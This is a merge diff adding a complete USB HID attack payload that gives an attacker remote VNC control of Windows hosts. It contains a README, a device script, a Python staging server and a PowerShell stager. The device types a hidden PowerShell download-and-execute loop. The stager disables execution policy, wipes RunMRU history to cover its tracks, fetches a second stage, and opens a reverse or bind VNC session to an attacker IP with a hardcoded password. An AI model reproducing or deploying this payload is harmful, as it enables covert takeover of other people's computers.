Merge 2be0d05f3e into 9bc2a0312d

payloads/library/remote_access/WindowsBindAndReverseVNC/README.md

@@ -0,0 +1,35 @@
+# Windows Bind and Reverse VNC
+* Author: El3ct71k (Nimrod Levy, Scorpiones)
+* Version: Version 1.0
+* Target: Windows 7, 8, 8.1, 10
+
+## Description
+In computing, Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction, over a network.
+Invoke-Vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. Password authentication is supported.
+
+## Configuration
+
+you must edit the payload file and update the following variables:
+
+* ATTACK_TYPE - with this variable you will choose with which type of payload you want execute (bind connection / reverse connection)
+1. bind - open VNC port on the victim host (connect directly to your victim)
+2. reverse - connect to the attacker VNC server (reverse connection, attacker machine must be on listen mode)
+
+### for reverse VNC please update the following variables:
+1. ATTACKER_IP - your VNC server (the IP must be resolved from the victim computer)
+2. VNC_PASS - A password for authentication to the victim
+3. PORT - A port that your attacker machine is binded
+
+### for bind VNC please update the following variables:
+1. VNC_PASS - A password for authentication to the victim
+2. PORT - A port that the victim computer will listen to (the IP must be resolved from the attacker computer)
+
+## On your attacker machine:
+* vncviewer -listen - in order to binds a vnc server on your attacker machine (this command is mentioned to reverse vnc)
+* vncviewer IP:PORT - in order to connect to victim computer (this command is mentioned to bind vnc)
+## STATUS
+
+1. Purple - Initial processing (cleanning cache files from previous execution and starts HTTP server)
+2. Yellow - Starts HID attack and typing a staged payload based on powershell
+3. Cyan - Starts Ethernet attack and waiting for the powershell payload that will executes the second payload from the server
+4. Green - Attack Finished

payloads/library/remote_access/WindowsBindAndReverseVNC/payload.txt

@@ -0,0 +1,45 @@
+#!/bin/bash
+#
+# Title: Invoke VNC attack
+# Author: El3ct71k, (Nimrod Levy, Scorpiones)
+# Version: 1.0
+#
+# Invoke-Vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. Password authentication is supported.
+LED SETUP
+ATTACKMODE HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+ATTACKER_IP=172.16.109.130
+VNC_PASS=P@ssw0rd
+PORT=5500
+ATTACK_TYPE=reverse # reverse or bind
+
+
+ATTACKMODE HID
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+rm -fr EOF
+# server.py can now instant bind sockets
+LED STAGE1
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python server.py &
+
+if [ "$ATTACK_TYPE" == "bind" ]; then
+    URL="http://$HOST_IP/?attack_type=bind&port=$PORT&password=$VNC_PASS"
+else
+    URL="http://$HOST_IP/?attack_type=reverse&port=$PORT&attacker_ip=$ATTACKER_IP&password=$VNC_PASS"
+fi
+
+RUN WIN "cmd.exe"
+QUACK DELAY 2000
+QUACK STRING "powershell -WindowStyle hidden \"while (\$true) { try { IEX(New-Object Net.WebClient).DownloadString('$URL'); exit } catch { Start-sleep -s 1 } }\""
+QUACK ENTER
+
+LED SPECIAL4
+
+ATTACKMODE RNDIS_ETHERNET
+
+LED ATTACK
+while [ ! -e  "/root/udisk/payloads/$SWITCH_POSITION/EOF" ]; do sleep 1; done;
+LED FINISH

payloads/library/remote_access/WindowsBindAndReverseVNC/server.py

@@ -0,0 +1,64 @@
+#!/usr/bin/python
+
+"""
+Invoke VNC attack
+Build by El3ct71k, Nimrod Levy (scorpiones)
+El3ct71k@Gmail.com
+"""
+
+import os
+import urlparse
+import time
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+abspath = os.path.abspath(__file__)
+CURR_DIR = os.path.dirname(abspath)
+
+
+class S(BaseHTTPRequestHandler):
+    def _set_headers(self):
+        self.send_response(200)
+        self.send_header('Content-type', 'text/plain')
+        self.end_headers()
+
+    def do_GET(self):
+        self._set_headers()
+        path = urlparse.urlparse(self.path)
+        path = urlparse.parse_qs(path.query)
+        if 'stage' in path:
+            with open("%s/Invoke-Vnc.ps1" % CURR_DIR, 'rb') as file_obj:
+                content = file_obj.read()
+                with open("%s/EOF" % CURR_DIR, 'w') as file_obj:
+                    file_obj.write("1")
+                self.wfile.write(content)
+        else:
+            if 'attack_type' in path and 'port' in path and 'password' in path:
+                with open("%s/stage1.ps1" % CURR_DIR, 'rb') as file_obj:
+                    content = file_obj.read().replace("IP_ADDRESS", self.client_address[0])
+                    if path['attack_type'][0] == "bind":
+                        attack_command = "Invoke-Vnc -ConType bind -Port {port} -Password {password}".format(
+                            port=path['port'][0], password=path['password'][0]
+                        )
+                    else:
+                        attack_command = "Invoke-Vnc -ConType reverse -IpAddress {attacker_ip} -Port {port} -Password {password}".format(
+                            attacker_ip=path['attacker_ip'][0], port=path['port'][0], password=path['password'][0]
+                        )
+                    content = content.replace("ATTACK_COMMAND", attack_command)
+                    content = content.replace("SERVER_IP", self.headers.get('Host'))
+                self.wfile.write(content)
+
+    def log_message(self, format, *args):
+        pass
+
+    def do_HEAD(self):
+        self._set_headers()
+
+
+def run(server_class=HTTPServer, handler_class=S, port=80):
+    server_address = ('', port)
+    httpd = server_class(server_address, handler_class)
+    httpd.serve_forever()
+
+
+if __name__ == "__main__":
+    run()

payloads/library/remote_access/WindowsBindAndReverseVNC/stage1.ps1

@@ -0,0 +1,4 @@
+Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+IEX(New-Object Net.WebClient).DownloadString('http://SERVER_IP/?stage=2')
+ATTACK_COMMAND